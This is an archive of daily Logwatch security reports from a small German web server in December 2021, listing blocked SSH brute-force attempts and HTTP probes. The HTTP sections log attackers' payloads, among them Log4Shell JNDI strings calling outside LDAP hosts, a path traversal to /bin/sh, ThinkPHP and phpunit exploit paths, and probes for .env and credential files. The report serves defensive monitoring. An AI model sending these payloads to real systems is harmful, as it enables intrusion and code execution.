Logwatch for h2361197.stratoserver.net (Linux)
by root@zapf.in
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Fri Dec 24 04:42:04 2021
Date Range Processed: yesterday
( 2021-Dec-23 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 16:16 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
Connection attempts using mod_proxy:
49.113.101.166 -> zapf.wiki:443: 1 Time(s)
A total of 11 sites probed the server
139.59.131.46
148.72.158.94
161.35.236.158
167.71.102.181
174.138.0.214
182.127.166.65
185.142.236.40
2.58.149.155
212.192.216.78
54.166.112.108
89.248.165.45
Requests with error response codes
400 Bad Request
null: 13 Time(s)
/: 5 Time(s)
mstshash=Domain: 4 Time(s)
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 2 Time(s)
/robots.txt: 1 Time(s)
zapf.wiki:443: 1 Time(s)
403 Forbidden
/FrcS3CFURGOhH8IZnOVeEw?both=: 1 Time(s)
499 (undefined)
/: 6 Time(s)
/${jndi:ldap://142.93.172.227:1389/Exploit}: 1 Time(s)
/?s=${jndi:ldap://142.93.172.227:1389/Exploit}: 1 Time(s)
500 Internal Server Error
/: 44 Time(s)
/.env: 4 Time(s)
/.git/HEAD: 2 Time(s)
/?x=${jndi:ldap://195.54.160.149:12344/Bas ... I6NDQzKXxiYXNo}: 2 Time(s)
/ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s)
/robots.txt: 2 Time(s)
//login_sid.lua: 1 Time(s)
/?XDEBUG_SESSION_START=phpstorm: 1 Time(s)
/Autodiscover/Autodiscover.xml: 1 Time(s)
/actuator/health: 1 Time(s)
/index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 1 Time(s)
/mifs/.;/services/LogService: 1 Time(s)
/owa/auth/logon.aspx: 1 Time(s)
/owa/auth/x.js: 1 Time(s)
/solr/: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
root (125.87.86.147): 36 Time(s)
root (146.56.205.217): 35 Time(s)
root (213.6.203.226): 33 Time(s)
root (119.29.0.209): 32 Time(s)
root (49.232.221.113): 32 Time(s)
root (180.76.246.21): 26 Time(s)
root (202.111.30.6): 25 Time(s)
unknown (180.76.246.21): 21 Time(s)
unknown (49.232.221.113): 18 Time(s)
unknown (213.6.203.226): 17 Time(s)
root (115.248.153.89): 16 Time(s)
unknown (146.56.205.217): 15 Time(s)
root (121.5.107.215): 14 Time(s)
unknown (125.87.86.147): 14 Time(s)
unknown (202.111.30.6): 12 Time(s)
unknown (119.29.0.209): 11 Time(s)
root (106.75.222.175): 9 Time(s)
root (124.79.246.228): 6 Time(s)
unknown (115.248.153.89): 6 Time(s)
root (125-238-192-103-fibre.sparkbb.co.nz): 4 Time(s)
unknown (106.75.222.175): 4 Time(s)
unknown (121.5.107.215): 4 Time(s)
root (221.213.129.46): 3 Time(s)
root (60.30.98.194): 2 Time(s)
unknown (117.89.142.214): 2 Time(s)
unknown (139.64.23.74): 2 Time(s)
unknown (195.133.18.104): 2 Time(s)
unknown (49.158.25.166): 2 Time(s)
unknown (60.30.98.194): 2 Time(s)
unknown (80.119.132.77.rev.sfr.net): 2 Time(s)
postgres (106.75.222.175): 1 Time(s)
postgres (202.111.30.6): 1 Time(s)
root (103.254.198.67): 1 Time(s)
root (110.77.239.51): 1 Time(s)
root (148.102.25.170): 1 Time(s)
root (201.137.58.193): 1 Time(s)
root (45.88.137.100): 1 Time(s)
unknown (125-238-192-103-fibre.sparkbb.co.nz): 1 Time(s)
unknown (146.185.79.101): 1 Time(s)
unknown (156.234.168.70): 1 Time(s)
unknown (201.137.58.193): 1 Time(s)
unknown (62.233.50.53): 1 Time(s)
Invalid Users:
Unknown Account: 139 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
3 Miscellaneous warnings
10.191K Bytes accepted 10,436
10.191K Bytes sent via SMTP 10,436
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
3 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
3 Total 4xx Rejects 100.00%
======== ==================================================
231 Connections
131 Connections lost (inbound)
231 Disconnections
1 Removed from queue
1 Sent via SMTP
44 Timeouts (inbound)
1 Illegal address syntax in SMTP command
2 SMTP dialog errors
1 Hostname verification errors (FCRDNS)
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Disconnecting after too many authentication failures for user:
root : 1 Time(s)
Failed logins from:
45.88.137.100: 1 time
49.232.221.113: 32 times
60.30.98.194 (no-data): 2 times
103.254.198.67: 1 time
106.75.222.175: 10 times
110.77.239.51: 1 time
115.248.153.89: 16 times
119.29.0.209: 32 times
121.5.107.215: 14 times
124.79.246.228 (228.246.79.124.broad.xw.sh.dynamic.163data.com.cn): 6 times
125.87.86.147: 36 times
125.238.192.103 (125-238-192-103-fibre.sparkbb.co.nz): 4 times
146.56.205.217: 35 times
148.102.25.170: 1 time
180.76.246.21: 26 times
201.137.58.193 (dsl-201-137-58-193-dyn.prod-infinitum.com.mx): 1 time
202.111.30.6: 26 times
213.6.203.226: 33 times
221.213.129.46: 3 times
Illegal users from:
2001:470:1:c84::16: 1 time
undef: 108 times
49.158.25.166 (49-158-25-166.dynamic.elinx.com.tw): 2 times
49.232.221.113: 18 times
60.30.98.194 (no-data): 2 times
62.233.50.53: 1 time
64.62.197.32: 1 time
77.132.119.80 (80.119.132.77.rev.sfr.net): 2 times
106.75.222.175: 4 times
115.248.153.89: 6 times
117.89.142.214: 2 times
119.29.0.209: 11 times
121.5.107.215: 4 times
125.87.86.147: 14 times
125.238.192.103 (125-238-192-103-fibre.sparkbb.co.nz): 1 time
139.64.23.74: 2 times
146.56.205.217: 15 times
146.185.79.101: 1 time
156.234.168.70: 1 time
178.73.215.171 (178-73-215-171-static.glesys.net): 1 time
180.76.246.21: 21 times
195.133.18.104: 2 times
201.137.58.193 (dsl-201-137-58-193-dyn.prod-infinitum.com.mx): 1 time
202.111.30.6: 12 times
213.6.203.226: 17 times
**Unmatched Entries**
Protocol major versions differ for 134.122.134.150: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3 vs. SSH-1.5-Server : 1 time(s)
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
3 Jahre, 9 Monate
- 1
- 0
Delivery Status Notification (Failure)
by Mail Delivery Subsystem
** Recipient inbox full **
Your message couldn't be delivered to vik.t.oria.ilov.eba.c.kch.a.m(a)gmail.com. Their inbox is full, or it's getting too much mail right now.
The response was:
Storage quota exceeded
3 Jahre, 10 Monate
- 1
- 0
Logwatch for h2361197.stratoserver.net (Linux)
by root@zapf.in
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Thu Dec 23 04:42:04 2021
Date Range Processed: yesterday
( 2021-Dec-22 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 32:32 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
Connection attempts using mod_proxy:
91.200.100.126 -> 45.155.173.143:4444: 5 Time(s)
A total of 7 sites probed the server
156.146.50.142
193.169.253.168
2.56.59.221
217.138.211.252
44.199.209.141
66.240.205.34
80.82.77.139
Requests with error response codes
400 Bad Request
null: 22 Time(s)
45.155.173.143:4444: 5 Time(s)
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 3 Time(s)
/: 2 Time(s)
/config/getuser?index=0: 2 Time(s)
/socket.io/?noteId=features&EIO=3&transpor ... _TLsdTRoxSBAAAW: 2 Time(s)
mstshash=Administr: 2 Time(s)
/ab2g: 1 Time(s)
/ab2h: 1 Time(s)
/socket.io/?noteId=3C_FMCSdSEGBZ92mPafDVA& ... W5I7k7RravlAAAT: 1 Time(s)
/socket.io/?noteId=3C_FMCSdSEGBZ92mPafDVA& ... p5mA-UjrOXyAAAS: 1 Time(s)
/socket.io/?noteId=3C_FMCSdSEGBZ92mPafDVA& ... pM21c5kUUiOAAAU: 1 Time(s)
/socket.io/?noteId=features&EIO=3&transpor ... qI2zCCy58PcAAAX: 1 Time(s)
/sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/: 1 Time(s)
404 Not Found
//2019/wp-includes/wlwmanifest.xml: 2 Time(s)
//2020/wp-includes/wlwmanifest.xml: 2 Time(s)
//blog/wp-includes/wlwmanifest.xml: 2 Time(s)
//cms/wp-includes/wlwmanifest.xml: 2 Time(s)
//news/wp-includes/wlwmanifest.xml: 2 Time(s)
//shop/wp-includes/wlwmanifest.xml: 2 Time(s)
//site/wp-includes/wlwmanifest.xml: 2 Time(s)
//sito/wp-includes/wlwmanifest.xml: 2 Time(s)
//test/wp-includes/wlwmanifest.xml: 2 Time(s)
//web/wp-includes/wlwmanifest.xml: 2 Time(s)
//website/wp-includes/wlwmanifest.xml: 2 Time(s)
//wordpress/wp-includes/wlwmanifest.xml: 2 Time(s)
//wp-includes/wlwmanifest.xml: 2 Time(s)
//wp/wp-includes/wlwmanifest.xml: 2 Time(s)
//wp1/wp-includes/wlwmanifest.xml: 2 Time(s)
//wp2/wp-includes/wlwmanifest.xml: 2 Time(s)
//xmlrpc.php?rsd: 2 Time(s)
499 (undefined)
/socket.io/?noteId=3C_FMCSdSEGBZ92mPafDVA& ... RngaPq2OBBlAAAV: 1 Time(s)
/socket.io/?noteId=3C_FMCSdSEGBZ92mPafDVA& ... W5I7k7RravlAAAT: 1 Time(s)
/socket.io/?noteId=3C_FMCSdSEGBZ92mPafDVA& ... p5mA-UjrOXyAAAS: 1 Time(s)
/socket.io/?noteId=3C_FMCSdSEGBZ92mPafDVA& ... pM21c5kUUiOAAAU: 1 Time(s)
/socket.io/?noteId=features&EIO=3&transpor ... MESwy-Vc1O8AAAY: 1 Time(s)
/socket.io/?noteId=features&EIO=3&transpor ... _TLsdTRoxSBAAAW: 1 Time(s)
/socket.io/?noteId=features&EIO=3&transpor ... qI2zCCy58PcAAAX: 1 Time(s)
500 Internal Server Error
/: 20 Time(s)
/robots.txt: 4 Time(s)
/.env: 2 Time(s)
/ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s)
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 2 Time(s)
/?x=${jndi:ldap://195.54.160.149:12344/Bas ... I6NDQzKXxiYXNo}: 1 Time(s)
/Autodiscover/Autodiscover.xml: 1 Time(s)
/ReportServer: 1 Time(s)
/_ignition/execute-solution: 1 Time(s)
/actuator/health: 1 Time(s)
/clover/gui/login.jsf: 1 Time(s)
/favicon.ico: 1 Time(s)
/fuel: 1 Time(s)
/login: 1 Time(s)
/owa/auth/logon.aspx: 1 Time(s)
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
/owa/auth/x.js: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
root (40.70.0.187): 34 Time(s)
root (101.178.223.39): 32 Time(s)
root (180.251.83.49): 32 Time(s)
root (46.101.94.164): 29 Time(s)
root (116.196.122.196): 22 Time(s)
root (125.19.244.38): 19 Time(s)
unknown (46.101.94.164): 19 Time(s)
root (139.186.155.99): 17 Time(s)
root (218.14.208.90): 17 Time(s)
unknown (101.178.223.39): 17 Time(s)
root (139.198.123.106): 16 Time(s)
root (161.35.45.62): 16 Time(s)
unknown (180.251.83.49): 16 Time(s)
unknown (40.70.0.187): 15 Time(s)
root (206.189.206.212): 14 Time(s)
unknown (104.131.68.23): 14 Time(s)
unknown (206.189.206.212): 10 Time(s)
unknown (218.14.208.90): 10 Time(s)
unknown (161.35.45.62): 9 Time(s)
unknown (139.198.123.106): 7 Time(s)
unknown (116.196.122.196): 6 Time(s)
unknown (125.19.244.38): 4 Time(s)
unknown (139.186.155.99): 4 Time(s)
root (104.131.68.23): 3 Time(s)
root (117.197.8.210): 3 Time(s)
root (41.215.138.42): 3 Time(s)
root (106.12.219.184): 2 Time(s)
unknown (186.210.85.101): 2 Time(s)
unknown (195.87.255.34): 2 Time(s)
unknown (83.24.19.118.ipv4.supernova.orange.pl): 2 Time(s)
unknown (net-37-179-143-123.cust.vodafonedsl.it): 2 Time(s)
mysql (101.178.223.39): 1 Time(s)
root (1.85.216.127): 1 Time(s)
root (146.185.79.101): 1 Time(s)
root (vmi738717.contaboserver.net): 1 Time(s)
unknown (106.12.219.184): 1 Time(s)
unknown (112.18.69.127): 1 Time(s)
unknown (114.67.104.59): 1 Time(s)
unknown (117.197.8.210): 1 Time(s)
unknown (134.236.247.145): 1 Time(s)
unknown (204.44.68.125): 1 Time(s)
unknown (46.161.27.162): 1 Time(s)
unknown (92.255.85.237): 1 Time(s)
Invalid Users:
Unknown Account: 147 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
2 Miscellaneous warnings
9.604K Bytes accepted 9,834
9.604K Bytes sent via SMTP 9,834
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
1 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
1 Total 4xx Rejects 100.00%
======== ==================================================
64 Connections
15 Connections lost (inbound)
64 Disconnections
1 Removed from queue
1 Sent via SMTP
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Failed logins from:
1.85.216.127: 1 time
40.70.0.187: 34 times
41.215.138.42: 3 times
46.101.94.164: 29 times
101.178.223.39 (cpe-101-178-223-39.static.nsw.asp.telstra.net): 33 times
104.131.68.23: 3 times
106.12.219.184: 2 times
116.196.122.196: 22 times
117.197.8.210: 3 times
125.19.244.38: 19 times
139.186.155.99: 17 times
139.198.123.106: 16 times
146.185.79.101: 1 time
161.35.45.62: 16 times
180.251.83.49: 32 times
194.163.133.196 (vmi738717.contaboserver.net): 1 time
206.189.206.212: 14 times
218.14.208.90: 17 times
Illegal users from:
2001:470:1:c84::21: 1 time
undef: 102 times
37.179.143.123 (net-37-179-143-123.cust.vodafonedsl.it): 2 times
40.70.0.187: 15 times
46.101.94.164: 19 times
46.161.27.162: 1 time
65.49.20.68 (scan-19.shadowserver.org): 1 time
83.24.19.118 (83.24.19.118.ipv4.supernova.orange.pl): 2 times
92.255.85.237: 1 time
101.178.223.39 (cpe-101-178-223-39.static.nsw.asp.telstra.net): 17 times
104.131.68.23: 14 times
106.12.219.184: 1 time
112.18.69.127: 1 time
114.67.104.59: 1 time
116.196.122.196: 6 times
117.197.8.210: 1 time
125.19.244.38: 4 times
134.236.247.145: 1 time
139.186.155.99: 4 times
139.198.123.106: 7 times
161.35.45.62: 9 times
180.251.83.49: 16 times
186.210.85.101 (186-210-085-101.xd-dynamic.algarnetsuper.com.br): 2 times
195.87.255.34: 2 times
204.44.68.125 (204.44.68.125.static.quadranet.com): 1 time
206.189.206.212: 10 times
218.14.208.90: 10 times
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
3 Jahre, 10 Monate
- 1
- 0
Logwatch for h2361197.stratoserver.net (Linux)
by root@zapf.in
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Wed Dec 22 04:42:05 2021
Date Range Processed: yesterday
( 2021-Dec-21 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 8:8 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
Connection attempts using mod_proxy:
58.48.130.197 -> zapf.wiki:443: 1 Time(s)
A total of 7 sites probed the server
172.104.153.110
2.56.59.221
222.186.19.235
34.96.130.12
45.87.61.105
66.240.205.34
89.248.165.46
Requests with error response codes
400 Bad Request
null: 8 Time(s)
/: 5 Time(s)
mstshash=Domain: 4 Time(s)
/config/getuser?index=0: 2 Time(s)
/socket.io/?noteId=MTzjVrgrS7m8oUZGT_fu-g& ... 9ozdKvGWN2CAAAF: 2 Time(s)
/w00tw00t.at.ISC.SANS.DFind:): 2 Time(s)
http://fuwu.sogou.com/404/index.html: 2 Time(s)
/.git/config: 1 Time(s)
/bag2: 1 Time(s)
/socket.io/?noteId=MTzjVrgrS7m8oUZGT_fu-g& ... fAQi2nHYbDLAAAG: 1 Time(s)
mstshash=Administr: 1 Time(s)
zapf.wiki:443: 1 Time(s)
499 (undefined)
/socket.io/?noteId=MTzjVrgrS7m8oUZGT_fu-g& ... 9ozdKvGWN2CAAAF: 1 Time(s)
/socket.io/?noteId=MTzjVrgrS7m8oUZGT_fu-g& ... DFGGywPP27KAAAH: 1 Time(s)
/socket.io/?noteId=MTzjVrgrS7m8oUZGT_fu-g& ... fAQi2nHYbDLAAAG: 1 Time(s)
500 Internal Server Error
/: 22 Time(s)
/.env: 5 Time(s)
/.git/config: 2 Time(s)
/ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s)
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 2 Time(s)
/.ftpconfig: 1 Time(s)
/.remote-sync.json: 1 Time(s)
/.vscode/ftp-sync.json: 1 Time(s)
/.vscode/sftp.json: 1 Time(s)
/actuator/health: 1 Time(s)
/api/.env: 1 Time(s)
/api/.ftpconfig: 1 Time(s)
/api/.git/config: 1 Time(s)
/api/.remote-sync.json: 1 Time(s)
/api/.vscode/ftp-sync.json: 1 Time(s)
/api/.vscode/sftp.json: 1 Time(s)
/api/deployment-config.json: 1 Time(s)
/api/ftpsync.settings: 1 Time(s)
/api/sftp-config.json: 1 Time(s)
/deployment-config.json: 1 Time(s)
/favicon.ico: 1 Time(s)
/ftpsync.settings: 1 Time(s)
/mifs/.;/services/LogService: 1 Time(s)
/owa/auth/logon.aspx: 1 Time(s)
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
/owa/auth/x.js: 1 Time(s)
/robots.txt: 1 Time(s)
/sftp-config.json: 1 Time(s)
502 Bad Gateway
/siegen17/pdf: 1 Time(s)
/socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NtSYsPh: 1 Time(s)
/socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NtSYsfL: 1 Time(s)
/socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NtSYsvE: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
root (125.19.244.38): 51 Time(s)
root (122.51.64.115): 38 Time(s)
root (62.234.135.208): 38 Time(s)
root (20.48.0.101): 32 Time(s)
root (139.198.175.104): 31 Time(s)
root (222.72.101.250): 27 Time(s)
root (81.70.163.61): 20 Time(s)
unknown (125.19.244.38): 20 Time(s)
unknown (139.198.175.104): 19 Time(s)
root (143.110.212.213): 18 Time(s)
root (139.186.155.99): 17 Time(s)
unknown (20.48.0.101): 13 Time(s)
unknown (222.72.101.250): 13 Time(s)
unknown (122.51.64.115): 12 Time(s)
unknown (139.186.155.99): 12 Time(s)
unknown (62.234.135.208): 12 Time(s)
unknown (81.70.163.61): 12 Time(s)
root (220.178.31.90): 6 Time(s)
unknown (143.110.212.213): 6 Time(s)
root (113.120.31.106): 3 Time(s)
unknown (112.111.0.245): 3 Time(s)
root (113.128.26.199): 2 Time(s)
root (113.128.33.106): 2 Time(s)
root (113.128.9.77): 2 Time(s)
root (122.4.40.9): 2 Time(s)
root (128.199.123.0): 2 Time(s)
unknown (141.98.10.82): 2 Time(s)
unknown (185.107.85.208): 2 Time(s)
unknown (33.red-2-139-121.dynamicip.rima-tde.net): 2 Time(s)
root (103.76.175.130): 1 Time(s)
root (113.128.10.155): 1 Time(s)
root (113.128.37.29): 1 Time(s)
root (122.4.51.32): 1 Time(s)
root (164.90.203.55): 1 Time(s)
root (202.137.20.53): 1 Time(s)
unknown (113.120.31.106): 1 Time(s)
unknown (113.120.33.62): 1 Time(s)
unknown (113.128.10.155): 1 Time(s)
unknown (113.128.26.199): 1 Time(s)
unknown (113.128.33.106): 1 Time(s)
unknown (113.128.8.75): 1 Time(s)
unknown (122.4.51.32): 1 Time(s)
unknown (156.234.168.70): 1 Time(s)
unknown (209.141.47.245): 1 Time(s)
unknown (220.178.31.90): 1 Time(s)
unknown (ltlkwlb.cn): 1 Time(s)
Invalid Users:
Unknown Account: 139 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
4 Miscellaneous warnings
9.648K Bytes accepted 9,880
9.648K Bytes sent via SMTP 9,880
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
2 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
2 Total 4xx Rejects 100.00%
======== ==================================================
1903 Connections
1844 Connections lost (inbound)
1903 Disconnections
1 Removed from queue
1 Sent via SMTP
1 Hostname verification errors (FCRDNS)
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Failed logins from:
20.48.0.101: 32 times
62.234.135.208: 38 times
81.70.163.61: 20 times
103.76.175.130 (130.175.76.103.iconpln.net.id): 1 time
113.120.31.106: 3 times
113.128.9.77: 2 times
113.128.10.155: 1 time
113.128.26.199: 2 times
113.128.33.106: 2 times
113.128.37.29: 1 time
122.4.40.9 (9.40.4.122.broad.jn.sd.dynamic.163data.com.cn): 2 times
122.4.51.32 (32.51.4.122.broad.jn.sd.dynamic.163data.com.cn): 1 time
122.51.64.115: 38 times
125.19.244.38: 51 times
128.199.123.0: 2 times
139.186.155.99: 17 times
139.198.175.104: 31 times
143.110.212.213: 18 times
164.90.203.55: 1 time
202.137.20.53 (ln-static-202-137-20-53.link.net.id): 1 time
220.178.31.90: 6 times
222.72.101.250: 27 times
Illegal users from:
2001:470:1:c84::30: 1 time
undef: 97 times
2.139.121.33 (33.red-2-139-121.dynamicip.rima-tde.net): 2 times
20.48.0.101: 13 times
62.234.135.208: 12 times
64.62.197.152: 1 time
81.70.163.61: 12 times
112.111.0.245: 3 times
113.120.31.106: 1 time
113.120.33.62: 1 time
113.128.8.75: 1 time
113.128.10.155: 1 time
113.128.26.199: 1 time
113.128.33.106: 1 time
122.4.51.32 (32.51.4.122.broad.jn.sd.dynamic.163data.com.cn): 1 time
122.51.64.115: 12 times
125.19.244.38: 20 times
139.186.155.99: 12 times
139.198.175.104: 19 times
141.98.10.82: 2 times
143.110.212.213: 6 times
156.234.168.70: 1 time
185.107.85.208: 2 times
205.185.125.184 (ltlkwlb.cn): 1 time
209.141.47.245: 1 time
220.178.31.90: 1 time
222.72.101.250: 13 times
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
3 Jahre, 10 Monate
- 1
- 0
Logwatch for h2361197.stratoserver.net (Linux)
by root@zapf.in
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Tue Dec 21 04:42:05 2021
Date Range Processed: yesterday
( 2021-Dec-20 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 16:16 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
Connection attempts using mod_proxy:
222.186.19.235 -> zapf.wiki:443: 1 Time(s)
A total of 9 sites probed the server
112.238.44.65
143.198.155.215
159.223.72.33
161.35.151.45
165.22.25.152
165.232.185.23
170.106.176.49
185.44.81.176
222.186.19.235
Requests with error response codes
400 Bad Request
null: 9 Time(s)
mstshash=Administr: 5 Time(s)
/: 2 Time(s)
mstshash=Domain: 2 Time(s)
/.env: 1 Time(s)
/ab2g: 1 Time(s)
/ab2h: 1 Time(s)
/api/v1: 1 Time(s)
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 1 Time(s)
/manager/html: 1 Time(s)
F\x83\xA5D\xBBgtN\xEC\xE8\xAF\xA5\x8D`&UU\ ... x09\xC0\x14\xC0: 1 Time(s)
HTTP/1.0: 1 Time(s)
T\xDF\x96USST\x11.O\x03\xD6D\x05/\xF07\xA6 ... x09\xC0\x14\xC0: 1 Time(s)
\x88:\xAB(\xBC\x9A\xBBz\x88e\xC9E\xD7\x02S: 1 Time(s)
g\xC1\x81i\xB3\xF6\xF2\xCB\xB0\xA9\x19N\xD ... x09\xC0\x13\xC0: 1 Time(s)
zapf.wiki:443: 1 Time(s)
403 Forbidden
/FrcS3CFURGOhH8IZnOVeEw: 1 Time(s)
404 Not Found
/konstanz/2016/tagung/impressum.html: 1 Time(s)
/konstanz/2016/tagung/index.html: 1 Time(s)
/konstanz/2016/tagung/unterstuetzer/Sponsoren.html: 1 Time(s)
/konstanz/2016/unterstuetzer/impressum.html: 1 Time(s)
/konstanz/2016/unterstuetzer/index.html: 1 Time(s)
/konstanz/2016/unterstuetzer/tagung/programm.html: 1 Time(s)
/konstanz/2016/unterstuetzer/willkommen/wasistdiezapf.html: 1 Time(s)
/konstanz/2016/unterstuetzer/willkommen/wersindwir.html: 1 Time(s)
/konstanz/2016/unterstuetzer/willkommen/willkommen.html: 1 Time(s)
/konstanz/2016/willkommen/impressum.html: 1 Time(s)
/konstanz/2016/willkommen/index.html: 1 Time(s)
/konstanz/2016/willkommen/tagung/programm.html: 1 Time(s)
/konstanz/2016/willkommen/unterstuetzer/Sponsoren.html: 1 Time(s)
499 (undefined)
/: 4 Time(s)
500 Internal Server Error
/: 23 Time(s)
/.env: 7 Time(s)
/robots.txt: 3 Time(s)
/ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s)
/?x=${jndi:ldap://195.54.160.149:12344/Bas ... I6NDQzKXxiYXNo}: 1 Time(s)
/Autodiscover/Autodiscover.xml: 1 Time(s)
/actuator/health: 1 Time(s)
/api/v1: 1 Time(s)
/bag2: 1 Time(s)
/console/: 1 Time(s)
/hmc/hybris: 1 Time(s)
/index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 1 Time(s)
/owa/auth/logon.aspx: 1 Time(s)
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
/owa/auth/x.js: 1 Time(s)
/solr/: 1 Time(s)
/tips/tipsSimulationUpload.action: 1 Time(s)
502 Bad Gateway
/D1lk7Eb3Squ7uGiIXiErNg/pdf: 1 Time(s)
/socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NtPLnYm: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
root (202.101.186.218): 35 Time(s)
root (119.29.77.63): 30 Time(s)
root (188.166.221.11): 29 Time(s)
root (165.227.16.82): 28 Time(s)
unknown (188.166.221.11): 20 Time(s)
unknown (119.29.77.63): 18 Time(s)
unknown (165.227.16.82): 18 Time(s)
root (194.170.156.9): 17 Time(s)
root (106.13.74.61): 16 Time(s)
root (81.70.163.61): 15 Time(s)
unknown (202.101.186.218): 14 Time(s)
root (45.137.197.35.bc.googleusercontent.com): 13 Time(s)
unknown (106.13.74.61): 9 Time(s)
unknown (194.170.156.9): 9 Time(s)
root (186.178.57.81): 6 Time(s)
root (189.254.255.3): 4 Time(s)
root (103.133.57.250): 2 Time(s)
root (89-97-218-142.ip19.fastwebnet.it): 2 Time(s)
unknown (110.136.232.7): 2 Time(s)
unknown (158.red-79-153-190.dynamicip.rima-tde.net): 2 Time(s)
unknown (79.140.124.247): 2 Time(s)
unknown (82-65-33-144.subs.proxad.net): 2 Time(s)
unknown (89-97-218-142.ip19.fastwebnet.it): 2 Time(s)
unknown (host-24-224-178-87.public.eastlink.ca): 2 Time(s)
mysql (188.166.221.11): 1 Time(s)
root (159.192.209.87): 1 Time(s)
root (164.90.203.55): 1 Time(s)
root (219.145.61.20): 1 Time(s)
unknown (134.236.247.145): 1 Time(s)
unknown (146.185.79.101): 1 Time(s)
unknown (189.254.255.3): 1 Time(s)
unknown (195.133.18.104): 1 Time(s)
unknown (31.184.198.71): 1 Time(s)
